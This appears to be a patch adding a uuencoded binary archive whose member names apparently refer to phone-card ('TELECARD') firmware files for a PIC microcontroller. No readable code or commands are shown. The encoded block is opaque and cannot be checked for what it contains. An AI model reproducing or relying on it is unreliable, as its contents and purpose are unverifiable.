+MDW*[9!+]9G=\Q-"><=-&2D-[OJ0S0N@@H^'_RZACLZ9/^HK#DN+VY@K0-5J5
+MR0R;`5HCDIR^+`[WQ],L3]<YVLI9*$[3[)3G034PJ:16B<C^W7;BMY5OFSE0
+M;#$T0K<)6T:D*(RD;OWLI'XDIS!-J^$+<UEU7*)_'C0W7K*OU"ZUX"-9;[2*
+M(!KI07/1I56$7&1H4C#+[S3;3:;&G5B=]@90\((@407^4N(DQ%H&Z4X&/(.(
+MMW^@N-0]NGTYHEE.+'W_O+$_DN?EDN8HI/":+8DI6&U=E,M&BH'5A]D1NA%`
+MWM/6SB94Y[9-OD%CJ6&W0'S#>=JXFB33A=4OHJK\+A)MFF#8H`)>,XJZ"?^.
+MAGU5QC$\<2,;L"8IM`N@'$8Z%4@IU,JH>N0)X^L!H8I7==_0^5W#/2D*7OJ=
+M,.1]`"DV.!JH^PEFGP(G$:\KBC_`"URJ?57)KYJR9R"4<Y"++0?4;Q$-:K'8
+M(M9/K$-L9/I+JZ7^.$41/%8N=6FU'-#N=T!&V#BM*(K2Y<`-O)%^QR5\CH@P
+MQE]*%'.9))=EN`^1YK#.,6+G-P"ZP8D,;`:4A1ZQ-7Z@,@![U`]2<:$@%[C/
+M%A1GD)/UAOX"7&WYE0;J6G[%2%$2-2<ZL#52)XFJ_07U8^N.1GAC5S"=@7($
+M%$5[FC@G:J0Q^K9]$VS$T[JZ@:O'625.=]KDP<$QHC7LFS9UC]8OM>O\2U4*
+M/M<-J]W@]AC6NFI9UNZUK*V3*V_F`3]M>S-3MXR%1\L\*KRSV)`5%3W"R3&#
+M\#D5\KCQF)8Z@EJ^KQTFQBNJ3<%=4<44+#Y*28'E$,R%T,JC8KXGZ><XP\SD
+M:GYF6IS*O,;55!.)$&QP7]_<:469OTQ7E>B\X9<5)]Q7_F5"-KYJM1OB/RU]
+MJTRCU&QZ#_F13%.S^2*FFBRF:]6Z:(W(8V`XA[-,<PH[`4LS7'U%(,+^9V=G
+MVLQWH.UI/N;]))[U'4ZG.M=7,KRZORVSSB3U_17Z;6MP_@6E61CF)75.EM\F
+MU/KJG%ZB]PRD.H.ZQ_D.'M5.)IME(O,S6_2T3ZKM#)3@->)?:0?BZ/@;,1+_
+M:$@J+K_F](Y.CN5=)?!J(LPU<\?MCR_RJ[&0^_3T5#*61_W5>F^;S_P[G_YL
+M6>:SW:(?MNC/SUO[79C/[]Z9SY>7YO/5U6%^[R_$URUO,CHY_B]02P,$%```
+M``@`2E(P'8XZ.`_+"```^!\```P```!414Q%0U)$,BY!4TW%65MSV[@5?K9G
+M_!^.LYY-.Z6]I.S8[GCR0$NTPU:W4O*Z?<I`)"AA0Q$*"5IQ?GUQ(4B0E-S$
+MS6PTCC0ASH=S\.'<`!X='LS]^=`#@#?^;`)7U\XES)[3<)71E!8YC/":9L_0
+M1UD$WKI($*/9&XX:^K,Y!\'T_=3O.Y?]ZPL+@O<?O'_S,7_<'SX,/'C#AP+O
+M_LS[UP.''!W>@)8%_[<)3$D*;IZ39;K&*8,AR9F0Z@>#C_WA/T%_\.="_MKE
+M_V\@N+7A;Q"X%_!>&=9/:/A)(0=S]R6D:VO,`#$$DX)M"J:0@5I0`^D8.AV-
+M#'".F05#NCUU0T:>L,(_>M#!7QGX*XU_S`C#IUZ*%@FVX`.I9FDP%+@CKFG)
+M2<&905.N*?('777V%]L.I;K9&F4L%-K\@05.#Q;/#'/LW<.L/Y[O1#K7$GE7
+MY#B"(B4LAY`6*5=_='CKS_?"_BYAMX15TL/)9&J*F])(2@\IW4!?RWO>Q[NA
+M>[]3?B'E/6\:3$:*.;A+T/+H<.Z-I@[L-DEQ,,?K#<U0]@PSQG^7&'YQ%*ZW
+M!Q?MP_44[GP/#N_#G2O<Q1Y<O`]WH7`?'W?B>FU]CS!#3QC<*,IPGI?8V6YL
+M1^?<G3_,6A,<'1[0;%EB>K9MUW/=0']%-N`/9`1QP6BK!NR+GF7\ZTYRU9B$
+MIC%9%AEBA*;2Z7)CKMNWMOHX;]OS.$UC?.%"*4I4/)=^4B:MO_15`,BQX[^*
+M^1>@B;AV+/XM;/W"]8AO1S[IR2?GYTWIBPOQ]-T[\7UY*;ZOKFK,]453VC8=
+M[`;N.*DK%?LJNAYD=$G_;RQOZHO(-Z$RUYP^X9#1C`LN*:-BP!_[1C0*P7\4
+MZPWP0<*G)B@A7Q6Q&2T827%#BS^>_^[U.R06&T/1IN`6[_C<*$?)RL0D]BQ$
+M25)..W+]L;G'8F2-2,JM4@IJ>PXV=`.[-?`U<R.:2C+,8H)W2?.1(DLASNBZ
+M5O,KA`E&&<0R530<R';LYGH8RA@@Y?D0TTQ2*`T].SK41"_R6,JK:+&"J:WQ
+M;A@*H#86%BC]!([@)<FV$=ME<E_:MD4L7$5T"8RL118\6-.G9"N=WW$<;J9M
+MORT!D^G<GXR%CC/(,>,,+G,%V`JSRN'&H@2!G/@:*:UK:Q&?2LL,,YA.@CFX
+M,,^X.&(8AL)(;"J;!_[,;3%8*BO!3(-?TNITM-[^+ZVW+VB]W:EU$7[7KMEJ
+MUR0FF/>-$*EW33PWQ(3R)AM*3#YOR37MK^5N#7[LR%0JY)QS5;M%<(=T\VR0
+MTJZS!BGED#ESV)Y9>;Z(-9(N`3$XX3(<&[@C0\G=+.C@2B5\R%BBY[D#4[0*
+M+:;3<EE>!,^>UY],_P,@-NG[0TM#Q"QCQPH&M4K,RJ<08%1V>:IA>(TW<!+B
+MK50T<,U]OE&STQ3+S0$:ZS6615&SYX\'?IN4DCW1X&VH2%F1X&CQ7/))4F5G
+MEW@_#3.,<BR'%#0S`-T-J`"M#9A6V`B'<?ZU<B6K;G@'N,1J+RM21A(@[*W<
+MP*H4Z9VLM=Y30&D$2[X5.5UC6(L%2Q\^?N5VAXWM]CS_KA%$C>[03]E9>\=+
+MX&/@C4M@`S(@N>C%7^TB.K/9,FE7^51U^*(N5@6VX1GS_IZDK89$W=(%]36D
+ML3@/S;4;_1L./P&)NUVU"!]C:QOE7)GXB6PZ2"):F?4FP0Q'+^Z6;&9*4(F0
+MS=^?MUF"E%SJD"<.:U@6%4V**/\[SAHO,.+'D%(&\D3XA^C!%HC/(_Q_BX@1
+M`(U$V3SN['3C4O'^[*UZ2,Z];)8BX3<R%9W8H>%ENY)RZ66MG%"=QJJDUSXK
+MWL`]W[YXU_G0T-=.E(8^,?1#$OX^WU`19[B&BB3KWO>JM*;<!T1KJMO%W"3Z
+MW;L6T2.T)"&,B_6"6_2+T_&1QNJY-J/W;ZQ>#)F*$'I14>__5=3AK)+UON"P
+M8+@]N09T22LS68,S0$M$TN/7Q>'^>)IF=)FAM3HV))1NCD4>U&<+G=1*$_G/
+M72=^6_FV/C+)*7J-T*W#E@MIB492MW]T4C]0!Q9C5;U7YK)RNV2K:=5W7ZH)
+M,JZWX`-9KHR*('M.J[[R,BI")C,TR3GS6X.[\:1Q.U:E/0MR41`4*L>?"YR&
+MV,@@W29:9!#Y]'>4%*9'MZ])#.;DT+>WYOLC>58L6(9"!B=\2!X8]=1YL:BM
+ML&P#([KNRK7DA9I<[1G_"$K3KU`3U.O6A:\XH[6'*3'31O.BH$SK,K^*SG*%
+M<CCA$J+3EJG8[,H[N5G1%1=)`D^"VP:LS@7MNJ<:YD[AT0MJ)5(SX"3G9ASH
+MFE6>R#N?&QB1/!<5WPU#4?Y)OL*1I4_PG)\<IY$H)UH_P"L\J7U7*>Z:-L]`
+MF-"@!EM^9UXC-J3E8$NX>;73$FXD^$N[M?PA11$\PI:P%9Q<VBV_<QI^5_LJ
+MGZ;R55D+E<M!/_`&YBV0]#DBHQ=_+E`B;%):%N$^!,U@F6'$]\\"ML*IBF<.
+M5/4=\3&QH2KN=BP_H/+(K0:$S^8,;R`CRQ7[";B*^=@`=9F/N2A*HWI'+<<0
+M==.HG%]*/[9N,:0W=@TS%6A'0%&TIW=SH]J:1KNV[[`=B6RN[ZBJD[<VIWO(
+M%,$A,+(CW'7(-#W:O-6NTB[3F??<)-:XPMU!K'W58M;9R:QCBFMO%@$_:7LS
+M7VZ12(]6>51Z9[XB,9.MP=$AAXCC*61)[3&MY4AI];QRF`3'S#C\=DV5AU_Y
+M5DH9K,Z^P@BC*FKE>Y)^AC>84ZZ/S7P5QRJOB67J@X@TS!I5=UM&+18/:5R:
+M+OI\>3;3";E;]55";KS6:O?!?UKZUIE&+[-N.=1;,F.9]2LQW5OQM98=B]%_
+M/`8-YW`7-&.PE3"ZP>5K!"+Y+TMS1W6GVZG?YOT@G=753:<Z5S<QHKJ?%IO.
+M`>K;*_1IZ[S\$TJS).8U=4Z5WSK4=M4YLT3O.8>:"JH>YQMTE#,UU2Q2E9_Y
+MH&>\4VUGH!0OD7A-:\FM$T_D2?A[0U)K^3F[=\#_O/'@Z/"_4$L#!!0````(
+M`)M$+AW$&QM@"@4``#P7```,````5$5,14-!4D0N0C`QE9A+C]LV$,?O`?(=
+M"-W;D#-\"3T4BM9)W.QZ#5N[27LI@F#1YM`'VGY^H"3%&;THRX8!P?)_R!^'
+MG*&'_*'[\N=O?WUW_OK[RQ]?_OOV53RK[T&^B//+/]]>_A7[_>M777-X__CK
+MN?VP>VBZ?2M4^#2O7YT_[':=D.&CE*U1>+!>V/#[_I>=0.6,4";\;)TTPIC:
+M#;^]?O73TZ$56DLI(#SRNX'X;OE=QW>#PSO&=S6\FZD]`NO'YM0)[>)[A&BL
+MP\.%T00YCR8-/#UE\BBT:KKN)*KNY^.N$K6H/G?-?=7WHKWL+9&L[G;G_?M#
+MTSV>>EN5+8V96W[^,5E4/25^6$F`2YJ>:<?](6-4')7F;^S*I)-#\Q!<45)4
+MC^<6X@@A-U"V'V+H,'@26E=-D(V/<K!1X%G/0&0@7@E4!,0B\",!<0P\[=JN
+M(:8D_](JYG7='>[R`H=5#6VB$3J)`FR=S)W0$(90;Z_P<=\JVWI=]11,,W-A
+ME9^"2QA#`7%N^;2ZR@-DKJ?)E>1#^@8IV@1<GMQ3$Q>S;QDFS\%\;N/41P6\
+MCQV/UE(Q3MV`PXI:%G%Q-*J(`\;!#3C]YM2U;47-B\PX)"@RD9E(3+7%?&CO
+MPQ+GID6>CG*1IYFGB>>V>.\/=Q6U+.),E(LXPSAS_92^E6_VAZZBUD6DC7(1
+M:1EI;T#&(+3K.!?E(LXQSMV`@XI:%G$^[T9+G&><OP$7X\^OX^HH%W$I;6M*
+M^!3B6N!62BA*^-B?DGJ1\3ZG?'J,=V_%/'4#3U+&K_%<SOD%#Y@']%!;O/QO
+M`9>`-B?\`H@,1-YHK@`"Y?L:T.2,7P`U`S4!W1;P.>UG^A)/YY1?\`SSS/4K
+M^-91MJ_Q,.?[@F>99V_@64KW-1[DA%_P'//<#3Q#^;[&H_ICP?/,\S?P-"7\
+M&D_FE!_S<CDS5"JZ)OBRG*'Z5:"*]:I'%2P#W,!5]6K;'"N!QL22*CQL'*$B
+MJ^?F_JDW`Q!_OR/#.*3:7BAY8IKTIG%T-GO=G%J!UKM<3((12J-P.H[J?G_8
+MA2;LB\%L)D>JA:Q:LANKL84,G>:VS@SUTJAC&)IN%*--]&%2^JI9Z8LX+7U5
+MIO'PTI+10"_3WD::)YK6<US4^T(<\G*6(P$I$HSD2-"W1H*Y-A)@,Q(4F>IB
+M)."E2$".!"Q$`G(DS-78`C@2<!D)R)&`-T4"7HX$+$<"_]700*^,!-R(!%R+
+M!%/SU(2OHQ,UNJLB87]^=#[^=::.E)67C[%/4`D+_8%J9LD'')NJ7*]F.I-&
+M1HM.V*ATL$U#A'3$M/0-MA;TTZF+SD&V7QXSH^_.1WE^KNUYP#RXAM?>?R0>
+M%'F.>%#F2>;):WBG,_LGBSQ//%GD(?N'?26VP;MKNB8#L>P@9""N.&C909L*
+MHPU@*HQZ!VV19\A!6^9YYOEK>.GDU?-\D:>)Y\L3R@N8OFW[=SS2?)87$&D^
+M5Q:0$P*O2HAW3^<=`<L9H0@XR8A<J?3[1)P9ZVCK&5<JG_:G7;ZI2_LOY#(Q
+M*_T16(X/PUE)T312Y-!FJ&I-?DP4P]=X@V(T[Q7KBN7[Q;XWSCH^QBX4SDSJ
+M#1<A-E'X0FRD:#U51B/`R;S!R%-6^-)B,M>3I!ISTM"+J]#/J)XJH_]+VA.6
+M"N92G'I35)J7%>"SY4B!R0&PO\4=/.V5X3ZWCY!Z<;$Y428WD(NHPCG'T)[.
+M]R0+A??]\:C!CJ^KELIPZ_P_4$L#!!0````(`*)$+AW[.7CW$P4````@```,
+M````5$5,14-!4D0N0TU0[5A;3QM'%#Z[W@064R#@A$L2V``-A!C8F[VFBE0M
+M:R=UPL6RS>4!J5()2I`01B0OE?*`JDK]#97R`_+8O%1YJ)I(;=0^]*&J^`'-
+M#ZC4]Q*[Y\S,WK*_H'0/:[/S?=\9S^R<F3TSFS*X`"L`51G*%\`M`4"S"RHR
+M_M<T$V2E\^[ENY?0#=7&NE,RBC`MU:J>4?1*-I"=:)IFD.S5F]_>0A\TUN\;
+M)9B0MION2B"P(O4P(B<S-\8'U0T1:'+0_[4!F;DSC'E6,@AH.D>\UM&7Q_N/
+M'C_59KU;FK%46LHOZ9KK>945K;FW^_BP==!ZM+_W)*]5#W<7-&-!SVOKM<H:
+MM#/![X/R]^OI7R4IUR<K$FLC;&!S90FHN?5JP],JE5I]?55;W=\];NVV#I\>
+MMPX.]HY!!>@Y;3_OE._D)0#\*'77A*Q!:"F&6I`U"3UM1U%[L=[T/,A:1!VU
+MW8!:]5;JD+4)[FW?"^![:V7(%@A]\3Y2S[*^6%UK0K9(3#G&&)!U"/WS+(J:
+MT>Y+V1(IGL44V-XEZ/E.>=Y1[IRV`?"#[<7:<&@1+L5@'6&'X-.V%,#K#8_D
+M1<*/VG(4IT=4(+RWW17@F_0@#)O@%^\CM2\["%L$EV-P$6&3X#_/HG`!88/@
+M9S'81EC'\9+Z`4;.OKX?=O^K#'[)@^I#J/T#%^7![KST$.B&ARO&PJ?@%[HA
+M"%55DE2054F&_[SE8!#'/0.=SIRT5FE^KNN&YAO.0J]>-G9@@&8;?0'U6`)?
+M:B:E.9+FDE(K*1TCZ5A2:B>EXR0=3TH+2>DD22>3TF)2.D/2F:3424KG23J?
+ME):24IVD>BC-R^SFI/+)SF=NO;SEUBL[8GW;$4X0.$]E(!,L=A+^;1MTL1HN
+M_O3MSP3-9*`KMG(2N&'0Q71;;[[X0>AZV#+IUI@$IQY>IJD=W66ZS1]?^_5E
+M8SJ#KJCNF[>$W\Q`;W1Q9C]KTL5DW_\R^HJ@$04GVQ`)EV$9_[&XH3(C/B;"
+MI;<.&RE61L*`X="#A<^P3]S\P(/*8PI._VM$.."M/,#?9W%TS:<TH@I`RTH7
+M"QZ&I)8T&7['@.MT%.A3'5SC\+FIM.I!#HLJ+\;>^*FEEMHY,0G?-G^P^=_I
+M9(.%$]\;B@-S=*M`CVK!1;K%-"&UU%([5S8$?^'$5OS$:9IFN@VTU^SBZ=:T
+M3]TBJ@3U1A.3!I8U$W*5J$6B3"B[31>7%)8F+_INM*,_*<)6G=QTHDR?*A)E
+MP6:MQA):M*)?HT.4`7<W&A40NRR'N5EPB>>#;"NI\.SRDJ`N$_4`V.Y3X6GD
+M95:C`X.LP@)WD[G;H."N,*[(_23N1]@H<B.\(;2U5W@[1@0SRCM-VWO!$#*.
+MS%7>KV"+K_#LE.#K2%_G3\3?N0OV.NN#`Q-\!-@A@,1SUPE!W6!ML:-I[0W1
+MF"F>\$;&;4HPLSQ+IM,`A0_;K&#FQ(`N!UV;@]3^9W:%S7_*`R@D;E-(+`$=
+M`8F0N"UB+\]B#Z/%-7PJ+Z@%1F&(X5F0PF?_@J`,1N%4P(,<A<]^0U`6HW#^
+MX&&.J-`2E,THG'1XH",H6U`%1NE`ASJ"(FBDFY]1B!.,<#^-1"XDS!@Q%A)6
+MC!@/"3M&3(9$(4;,A$0Q1LR'A!,C])`HA<2PJ@/E62>XZ]X[?K+?.@1CP=2A
+M7\4G]5%T<X;E/E[VM^,<[/\`[%/Y4"*VC8X#6+P@BNR(=L!/[WP@M=122RVU
+MU%)++;5S;/\"4$L#!!0````(`&M2,!W64,AT+0@````<```,````5$5,14-2
+M1#$N0T]$[9B)=Q/7%<:_T6BS,<88`S88[)`V59O$C$!F20)8ED9&P9:4D80#
+M66P6DZ0A"0424A*2:VP<.\ZBD(V=[FW3EG3?V^;/Z?_0<TJ_N=)(0QN?TT)[
+MNO%T_(-OEC?OWO?N)\T+X-::@?_NUG)\XO#$@:,'XWW)XLA-W!^);RI.'-F:
+M^)/9:L7[K`V]#OO;=VSB(/[9S40847Z:L!A!?30_U1:*;TIM2=Q4KX.US__&
+M;-YN_VAKBU7_O0:S]6.,]*YOG<*UUK[6IMKYJ14'\4=K$G^VSN"Z-8.I]DGC
+MC#%CM%AS/!?MF&J/1L^AQ;K`OVG,&4W1L[V"Z>:YY@N+8C%>T1Y=.M5>L>9Y
+M]6QG?ZRJ5W?WQRYJ'YW16;>?Y?/+RE0?\6^V8W[E5'M_;+[3B;7QOBB?&>J8
+MZ=P?,Z)7,6F4K9Z`N68\%K#.877'?%L41O0\+N$RQJWN@-DU&3,[)V.76]S/
+M$NMR:$VT9?LT$+V"B'4I9':=BEU9?&G1R=B5GE";>_=,SUQLIGLN=JZYVMNX
+M=3[0&3T?,+LKL>H5IR.3B<$$$DL3ZQ(;$^E$.7$H<8)J^N9*[C^JA9/I5#YG
+MU<H_6M/QN@Y1%RW/'L)5'?=T!,%D>BCO=68$7)VUT;C>U9FZ-ER=S_F^/-B?
+M8Q<]W83P8+:4RI5JN@M&RC=87A].)9UT-ET[<!8A:F=/XWPPM;,^7!BFZGA=
+M!Q%).>FQU/`N[WK5Z5*RT3^UU[_14CWO%$O>^/7\J%V/G]I.9VOCQ20":=^`
+MW>O3O@%2AVR;$?OBM>T;\EW5&VX\7_`"C+DZG:P-U[T^:-LWYILZXX_7ML<R
+MP\FAJEZ-4"8Y7+0;^3(S10>^Z\.9<K&1_TY>7R[:7KI1@3G4>)P;?RB;2V<=
+M7_ZSN7HVZ"X(9W.EE#?CQB+W?,GV/\_5Z:'&^*G]ZR5"/9+,UCH80;2FJQER
+M]/[==JK>GYEU"O[Q18;S^8(7D+$*YG!Q$+[U%&QTSM8/<\1_/H)`KKZZJ^LC
+MEQ]S\EZ$IZJZZ.G]B%1U;0+']?RHXYV?0SA?*&7K^>!Z**0R0Y:O'EP=;\1O
+M%E+#\-57F#I9VEG3S0@4TK[QF;P_F^KW?,FX;JCN_RN]J:Y-U9OK.N+JS7'_
+M>+*-GQ:J\XZW_&"$JGK0YP^N3C7R9Q8:Y:CKK=`HQVI\Q0WPQ4>=],<3+HRE
+M\Z.Y1CT[@[[U7M49_WPZ@X6R?_X<?WY8[YP\=TE4#YR$Z11\XPNYVC<^KD=&
+MD_*/URGYUG_0/>\;3TAUQA^/4RKZ^P\72\E2N=B8KY(]4G^BT5W57D:,-56]
+MT=-KJ[H^'ST(NWK,ZV]]38_6=!\")?_Z#?)^)UOTSY^K_?/G:M_\!4M.V?;%
+M'RJ-Y<NE1G^!4><&OPN..G;.%W^(VG$:\V7NL7WY,&#LA>]^7K]W;+!N(,:M
+MOIW<;G_/&UP47>C%-@,#D8'6@24#N-W^;]JMOO\V\_O!L8?Z[(?*-W'W[?9O
+M;]>5@4\^G:*LZ+Y`1=VX8BK='0A#CQMZW-#C1NUX2!E61I1199.R6;E(V:)<
+MK&Q5+E&V*9<JVY7+E!W*Y<H5RI7*3F67<I5RM;);N4:Y5MFC[%7>H5RGO%/Y
+M&>5GE7<I/Z>,*3^O_(+R;N4]RGN5?<KU2DL9UR^Q!5C9H-RH3"C[E9N4FY5;
+ME%N5]RGO5SZ@W*;<KMRA'%`FE8/*E#*MM)499>V5H+)3F54^J-RE'%:.*'/*
+MO+*@?$CI*(O*DK*LW*T<53ZLW*/<JWQ$^:CR,>7CRC'EN'*?<K_R@/*@<D)Y
+M2+.X`"M/*)]4/J7\HO)IY6'E,\IGE<\ICRB_I#RJ/*8\KGR^ONJAJQNZNJ&K
+M&[JZH:L;E6;E(F6+<K&R5;E$V:9<JFQ7+E-V*)<K5RA7*CN57<I52J[N7KBK
+MNQ?X&[9UP_3^S[4?)-<B0O:XA)(5$.UU>[I#ZWR=]GJG^Q,YL`!9&XR?M>%F
+MP6-(R5RT*>4N=U.2->-FQ&.3LEG)O+0I)09FAQ7%[+"BF!&Y6WD/F!>Y%\R+
+M](%YD?5@7L0"\R)Q,"^R`<R+;`3S(@G^>H'T@WF136!>9+,;N6P!JUZV@E4O
+M]S%FR/UN@N0!,&+9!D8LV\&JEQU@U<L`XX`DP:J708X4K!Q6O:25-EC[D@%K
+M7X;`VI>=8.U+%JQ]>1"L?=D%UKX,PR)'P!J7'%CCD@=K/+``I0#6/NN)M2^.
+ML@@Z@)1`!Y`RZ`"R&W0`&04=0!X&'4#V@`X@>T$'D$=`!Y!'00>0QS!`/@XZ
+M@(RY^[HR#CJ`[`,=0/:##B`'0`>0@U`'D`G0`>00Z`#R!.@`\B3H`/(4Z`"L
+M'#J`/*T\#/J`/`/Z@#R+`OD<Z`.L'/H`*X>4H\ICH"?(<=`3Y'G0$^0%T!/D
+M!.@)\B+H"?)ET!/D).@)\A+H"?(RZ`9R"G0#>05T`WF5;]`0`=V@,LFW:\AI
+MY13H"3(->D)@`<H9T"MD!O0$>0WT!)D%/4'F0#>0UT$?D'G0!^0-T`?D3=`'
+MY"T<(=\&?4`JH`_(.Z`/R%G0!^1=T`?D/;Q`OH\3Y`=XD?R0;Y*0<WB)/(^7
+MR0O<&X!<Q"OD);Q*7H8PBBO<(X)<57X%I\FO8HK\&KA'*5_'&?(;F"&_B=?(
+M;V&6=WV;.P>0[RB_B]?)CS!/?@]OD-_'F^0/\#9YC7LTD(_Q#N_Z(??'(#]2
+M_ACODC_!>^1/\3[Y,WR@\_]S?$C^`N?(7^(\^2M<8!87H/P:%\G?<,<5\EON
+MND)^ARM\VN]QE?R#\A.7@85Y:@$:G\;;[5_8_@)02P,$%`````@`;5(P'=:1
+MH<KU!P```!X```P```!414Q%0U)$,BY#3T3MF?M[%-49Q[^SD[WD0MB$``D$
+M$L#JMM8P&^Y>('N935:2W75VEP@8$X2@5E3*15!1WY@0P6B[O0,"]M[6MMCZ
+M5_5_Z/.4?N>=G=VAFE^H3WVL.?OPR7[G7/:<][SGN[.#B?^N&`CAZUPZSLV>
+MFCU^YL3P4*H\<1_]H\G=Y=G3^W;^T^RTDD/6\*##\8Z=G3V!+[NT((I6OMK0
+MR?<L,;Z\$D[NSNS=>5^CINLO?S=7RC>KI.>ZL&-K-7OAY$+7U_PHKY3[*/&$
+M]_<.S,Y/,3:XO7,>=SJ'.EOK]?/K3N`?UAS^95W&76L1\]USQF5CT5AEW4"'
+MM8"KQORZ6,]\=RPF6&B[VG:C?4N"5[IC7?/=-6N)_:_T6@E/;^RW$A\9'=95
+M],:NL":V=FE-E>H3_KO2L[1^OMM*+/5.).+L%^,GA7L6>Z<21NQCS!E5:R!D
+M;CJ:"%G7L+%G*1Z#$;N.F[B%&:L_9/9=2IB]EQ*W.MS7:NM6>%.L8_\"/?(V
+MHM;-L-EW,7%[U<WV\XG;`^&XVWMQ8"&QV+^0N-;FC39C70_UQJZ'S/ZEA-?B
+MFU$BJ6RF6+#J]A^KZV1#AZG+EO_U$/%TTM=1M*2RHT5_,"/DZKR-9GM7YQK:
+M<'6QT+QY<,=S[+*O6Q%)YRN90J6N^V!D`I-UVV=2CG.XJ5LR8XWIP3!5)QN:
+MWYD9)SN=&3_HMU>=K:1\'7%U/EMOW^'5.^6*/U^MG[0;ZZ6VL_GZ_'`)H6Q@
+M@F[[;&""U&';Y@H#Z[/M>^+KZ>%[ZTO^`K>X.INJ3]=MWV+;]\:7.A=<KVU/
+MY\93HY[>B'`N-5ZVF_$R<V4'@?:17+7<C'<OVU?+=M9OL`1SM/EQ[OK#^4(V
+M[P3BGR\THD$W021?J&3\'3;:W?J*'?P\5V='F_.G#N9'E'HBE:\/,(9877L1
+MFM#^A^Q,8SPS[Y2"\XN.%XLE?T'&!ICCY30"^=/2')S%@CD1K(\B5&ADLY<?
+MA>*T4_17>-'395]/(>KI^@8>U?I)QZ]?0*18JN0;\6`^E#*Y42N0SZY.-M=O
+MEC+C")RG"'6J,E;7;0B5LH'YF>R?S^SR;_V,NX;J7?^A=S>TJ7I/0T==O2<9
+MG$^^>2NINNCXZ0<C[.ETP`]<G6G&SRPUCZ/F6ZEY'+WUE8<16!]U*KB>2&DZ
+M6YPL-,^SDP[DNZ=SP?UTTJ5J</^<8'QXWKEY;DIX%\[#=$J!^85='9@?\Y&K
+MR03GZU0"^=_BU@?F$U:="Z['J92#XT?*E52E6F[N5\6>:'RBT>]I/R+&)D_O
+M\/5F3S?V8P`15T_[XVVOZ\FZ'D*H$LS?%O9W\N7@_KDZN'^N#NQ?2\6IVH'U
+MARO3Q6JE.5YHTKG'[UHF';L06'^8VG&:^V4>M@/Q,&`<0:`_VQ^93C<,Q%BY
+M`?W?%X/W6GT81)^!D>A(Y\CJ$:17I;_L3UDI_Y_//]KX?>'8HT/V4]7[Z+U2
+MOO)R5QGZ[(LIRIH^%ZJI.]?TB6'-?0)EZ'5#KQMZW:A?#RLCRJ@RIFQ5MBG;
+ME1W*5<I.Y6IE7-FE[%:N4?8HURK7*=<K>Y5]R@W*C<I^Y2;E9N6`<E"Y1;E5
+MN4WY@/);R@>5#RD3RF\KOZ-\6/E=Y2/*(>5VI:5,ZI?:,JP-*W<H=RIW*7<K
+M]RCW*O<I'U4^IGQ<^81RO_*`<D294J:5&656:2MSROI/A-J8,J]\4GE0.:Z<
+M4!:4165)^93249:5%655>4@YJ7Q:>5AY1'E4^8QR2OFL<EHYHSRF?$YY7'E"
+M.:L\J5%<AK7GE2\H7U1^3_F2\I3R9>4KRE>5IY7?5YY1GE6>4YYO9#TTNZ'9
+M#<UN:'9#LQNU-F6[LD.Y2MFI7*V,*[N4W<HURA[E6N4ZY7IEK[)/N4')[!Z$
+MF]V#P.<8[X?IOV?NMY";$24'7$+)$Q`;=$?:XO[,=,\`WRA#RQ`!QK?"9*]M
+M+O$YQK<APMH'7$+)$Q4E'U1/>4A7D'!OSWFB&%.>*#>R/L-*QC>NE(?YY!L\
+M:6Z4?;8JVY2,=5PICX`1YSEDQ'D.&66QE$DPUC(,QEIV@+&6G6"L91<8:]D-
+MQEKV@+&6O6"L91_OB""/@K&6Q\!8R^-N-.4)T$ED/^@D<H!QA(RX0>=YXT(E
+MK<RX$9(L(P&QN7I(#O23T#*443`J,@9&1?*@S\B3H,_(0<8`,@[ZC$QPE9`"
+MZ#-2!'U&2J#/\!1:?.\HRZ"K2`5T%:F"KB*'0%>12=!5Y&G05>0PZ"IR!'05
+M.8I]NAO/@+XB4Z"OR+.@K\@TZ"LR`_J*'`-]19[#"'D<]!4YX?YO@<R"OB(G
+M05^1YT%?D1=`7Y$705_A>:.KR$O*4Z"WR,N@M\@KH+?(JZ"W\+S16WC>2#FC
+M/`OZC)P#?4;.HT2^!OJ,7`!]1BZ"/B.O@SXC;X`^(V^"/A-:AG()=!YY"W0>
+M>1MT'GF'O\\A`CI/;8Z_W2'O*N=!_Y$%T'_D,F;(1=!_Y#W0?^0*Z#]R%70>
+M>1_T%ED"O44^`+U%/@2]17X`>HO\$/06J8'>(C\"O45^#'J+_`2GR9^"WB(_
+M`[U%?@YZB_R"OT<AU_`:>1T7R!M\P@#Y"*^3-_$&>0MO<K:W^:0)\K'REWB+
+M_!7>)G^-=\C?0,C?8H[\'=XE?X]Y]OH#GS]`_JC\$RZ3GV"1_#/>(_^"*[K_
+M?\7[Y!T^ZX%\B@_8[V_XD%%<AK6_*S_3*\MS:AF&OH@KY2LK_P902P,$%```
+M``@`0$,<'6ZKZYS`!```8A,```H```!024-214<N15%5E9A1;Z,X%(6?!XG_
+MX,==:9M"TS19[1,!TB*E!1DZT<Q+18F3H"70-=!T_OW8A@2;V"3;EU:IO^.+
+M[[G7E_P#`L\V'^RO+_"<)KA(BKS"198A#+P\R>HU`HLT0[JF:V3AY!YT/^B_
+MFOTVOLS-AOP^2I%%$)6H`M]14A6X`2?7@!,)^"`%QR+X(`&G4G`J@M-S<&I*
+M0<,P.)`L.@-G\L,1P5G_<+R7Z+MKR\%[8<=;PGIYA7#]T>%4P/'@X,Y>ODXQ
+M6<\R2;;?`FN]QJ@LZ=]I211U#48V%X2H8C(5B.(,1.D>`3LKDG^!7=0Y0P-[
+M"53H7?,$N-CB>']$P+(X@/FO"NE:&%G1:RAGQXP-J[BJ^4@7(?^TL@-CCQFB
+MC#YRQP4^C"P%-VG"+'`%+.#=^CULKL`>.FPNP?@#Y;%IA]D]S')L_\608S/1
+M?]:M0PZ452O+J4%IZ'*'*=!_2^E/A&E"("KKC#\LUW4L_K14<<SN@>L&T'\&
+M3ES%@@`)YHI0.H%S3P;VTHJ>Y!JQU%A/Z78'YFE5LKHB1RF'W]NR(`@K)NX8
+MVZTCZ(57F\5AU946>4_@:MNH!*XVD$R`68GK9?_#2B;-WW5TES].8'12N),K
+MR!T@*-SIFA]$GBJ%34_R/WH/K6O/PK'+SNVY**N;,-WFZ29-XKRBAM&UY0!G
+M,&Z)8AD8P5=7!I(C^"%4H_"OA;4,>>RTG:Z]^$`>"7V\LX8(_M@8XS];T^N:
+M;4'X8_`Q[!CC7TWH0L>_M-CI29]GPTFW:24B:GT%\O-M[D6#E\E/A(MV[4#X
+M_;7!F^.O%%X:M^5T(*?I%(>\)1RUNIR(WOQ75>S-S;2*JV2W+K;L'KWQZZ.%
+M5!F_!,+`4(*3]M9N;1+$V].E:%"2'W-D_4E*FKKFP>!"@9WFC;:EI_FVJ>FC
